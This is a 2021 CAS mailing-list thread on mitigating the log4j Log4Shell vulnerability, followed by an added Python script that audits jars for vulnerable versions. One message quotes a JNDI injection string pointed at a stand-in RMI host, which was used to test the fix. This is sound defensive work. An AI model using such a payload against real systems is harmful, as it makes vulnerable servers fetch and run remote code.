I've rebuilt CAS with log4j 2.15.0 and confirmed that doing so stopped 
outgoing connections when a line like 
${jndi:rmi://www.example.com:80/test}
was submitted in the username field (I used a real hostname rather than 
www.example.com).

We were able to verify this fix with tcpdump on the CAS node as well as 
border-firewall logging.
On Friday, December 10, 2021 at 1:59:00 PM UTC-5 richard.frovarp wrote:

> Maybe? The one that I've seen
> https://logging.apache.org/log4j/2.x/security.html
>
> says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to 
> your JVM and not in the config file.
>
> On 12/10/21 12:55 PM, Mike Osterman wrote:
>
> Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in 
> the log4j2.xml config file might do the trick.
>
> I'm guessing we'd do that somewhere here at the top?
>
> <?xml version="1.0" encoding="UTF-8" ?>
> <!-- Specify the refresh interval in seconds. -->
> <Configuration monitorInterval="5" packages="org.apereo.cas.logging">
>     <Properties>
>         <Property name="baseDir">/etc/cas/logs</Property>
>     </Properties>
>     <Appenders>
>
> On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <
> [email protected]> wrote:
>
>> Using a new enough version of the JDK might also alleviate it? The other 
>> option is to throw the config option at the JDK to stop it from happening. 
>> That would seem to be easiest.
>>
>> On 12/10/21 12:36 PM, King, Robert wrote:
>>
>> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
>>
>>  
>>
>> Has anyone attempted to mitigate this CVE yet?
>>
>>  
>>
>> There seems to be two possible approaches to mitigation:
>>
>>  
>>
>> 1. The sledgehammer approach of removing the JndiLookup.class from the jar 
>> files:
>>
>>  
>>
>> zip -q -d log4j-core-*.jar 
>> org/apache/logging/log4j/core/lookup/JndiLookup.class
>>
>>  
>>
>> 2. Rebuild CAS and set “log4jVersion=2.15.0”
>>
>>

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to [email protected].
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/37170aad-78c6-4d0d-97d3-834030f0f6bcn%40apereo.org.
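The thread settles on three checks: is JndiLookup.class still in the jar, which log4j-core version is actually on the classpath, and did the rebuild take effect. The script below is an added example (not code from the thread or from the CAS project) that automates the first two across a directory of jars and WARs, including jars nested under WEB-INF/lib, where a `zip -d` run against the outer WAR would never reach. It also reproduces the "sledgehammer" step as a function so the removal can be verified and reversed. Assumptions: the fixed version is taken to be 2.15.0 because that is what the thread rebuilt with (adjust `FIXED_VERSION` to whatever your current advisory requires); the log4j-core version is read from `META-INF/MANIFEST.MF` or, failing that, from the jar name; `build_sample_tree()` creates constructed jars with placeholder bytes, not real log4j bytecode, purely so the audit can be exercised offline.

```python
"""Audit log4j-core jars for CVE-2021-44228 and optionally drop JndiLookup.class.

Added example, not code from the CAS project or the mailing-list thread.
"""
import io
import os
import re
import shutil
import sys
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Assumption: the version the thread rebuilt CAS with; raise it if your advisory says so.
FIXED_VERSION = (2, 15, 0)
NAME_RE = re.compile(r"log4j-core-(\d+(?:\.\d+)*)\.jar$")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); returns None if no digits are present."""
    parts = re.findall(r"\d+", text)
    return tuple(int(p) for p in parts[:3]) if parts else None


def manifest_version(zf):
    """Implementation-Version from META-INF/MANIFEST.MF, or None."""
    try:
        data = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in data.splitlines():
        if line.startswith("Implementation-Version:"):
            return parse_version(line.split(":", 1)[1])
    return None


def assess_log4j_core(zf, label):
    """Classify one open log4j-core jar. Note 2.15.0 still ships JndiLookup.class,
    so presence of the class alone does not mean vulnerable; version is checked first."""
    version = manifest_version(zf)
    if version is None:
        m = NAME_RE.search(label)
        version = parse_version(m.group(1)) if m else None
    has_lookup = JNDI_LOOKUP in zf.namelist()
    if version is not None and version >= FIXED_VERSION:
        status = "fixed"
    elif not has_lookup:
        status = "mitigated (JndiLookup.class removed)"
    else:
        status = "VULNERABLE"
    return {"jar": label, "version": version, "jndi_lookup_present": has_lookup, "status": status}


def scan_archive(zf, label):
    """Yield findings for this archive and every jar nested inside it (WEB-INF/lib etc.)."""
    if NAME_RE.search(label):
        yield assess_log4j_core(zf, label)
    for entry in zf.namelist():
        if entry.endswith(".jar"):
            with zipfile.ZipFile(io.BytesIO(zf.read(entry))) as inner:
                yield from scan_archive(inner, f"{label}!/{entry}")


def audit_tree(root):
    """Walk root and return findings for every .jar/.war/.ear found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.endswith((".jar", ".war", ".ear")):
                path = os.path.join(dirpath, fname)
                with zipfile.ZipFile(path) as zf:
                    findings.extend(scan_archive(zf, path))
    return findings


def strip_jndi_lookup(jar_path):
    """Rewrite jar_path without JndiLookup.class (what `zip -q -d` does), keeping a .bak.
    Returns True if the entry was present and removed, False if there was nothing to do."""
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        tmp = jar_path + ".tmp"
        with zipfile.ZipFile(tmp, "w") as dst:
            for item in src.infolist():
                if item.filename != JNDI_LOOKUP:
                    dst.writestr(item, src.read(item.filename))
    shutil.copy2(jar_path, jar_path + ".bak")
    os.replace(tmp, jar_path)
    return True


def build_sample_tree():
    """Constructed test fixture: a 2.14.1 jar, a 2.15.0 jar, and a WAR nesting a 2.14.1 jar
    under WEB-INF/lib. The class entry is placeholder bytes, not real log4j bytecode."""
    root = tempfile.mkdtemp(prefix="log4j-audit-")

    def make_core(path, version):
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder, not real bytecode

    make_core(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1")
    make_core(os.path.join(root, "log4j-core-2.15.0.jar"), "2.15.0")
    inner = os.path.join(root, "inner.jar")
    make_core(inner, "2.14.1")
    with zipfile.ZipFile(os.path.join(root, "cas.war"), "w") as war:
        war.write(inner, "WEB-INF/lib/log4j-core-2.14.1.jar")
    os.remove(inner)
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for f in audit_tree(target):
        print(f"{f['status']:<40} {f['version']}  {f['jar']}")
```

Run it with the path of the CAS deployment (for example `python3 audit_log4j.py /etc/cas` or the directory holding `cas.war`); with no argument it audits the constructed fixture. A nested finding is labelled `cas.war!/WEB-INF/lib/log4j-core-2.14.1.jar`, which is the case the thread's `zip -d` one-liner misses unless you explode the WAR first. `strip_jndi_lookup()` only makes sense as a stop-gap on a jar you cannot yet rebuild; rebuilding CAS with the fixed `log4jVersion`, as the thread did, is the check that actually makes `status` read `fixed`.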
